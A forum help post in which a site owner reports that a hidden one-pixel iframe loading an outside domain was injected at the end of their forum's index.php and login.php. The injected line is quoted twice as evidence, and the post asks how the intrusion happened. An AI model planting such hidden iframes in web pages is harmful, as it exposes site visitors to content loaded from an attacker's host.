Topic: Unexpected "<" ?
Hey there,
I think something strange is going on, but I'm not sure. So I thought I'd report it here.
A couple days ago my pun index returned an error saying there was an unexpected "<" on the last line of the index.php
I went into the index file and looked.
I found:
<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->
I'd never seen this before, so I removed it and the index worked just fine again.
I also reset my index page's permissions to be sure they weren't writable (they weren't, but i reset the permissions anyway.)
Today a similar issue appeared with login.php
same code:
<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->
appeaded at the bottom of the login.php
What's going on?
How are people able to get into my server and add this broken code?
How can I stop it?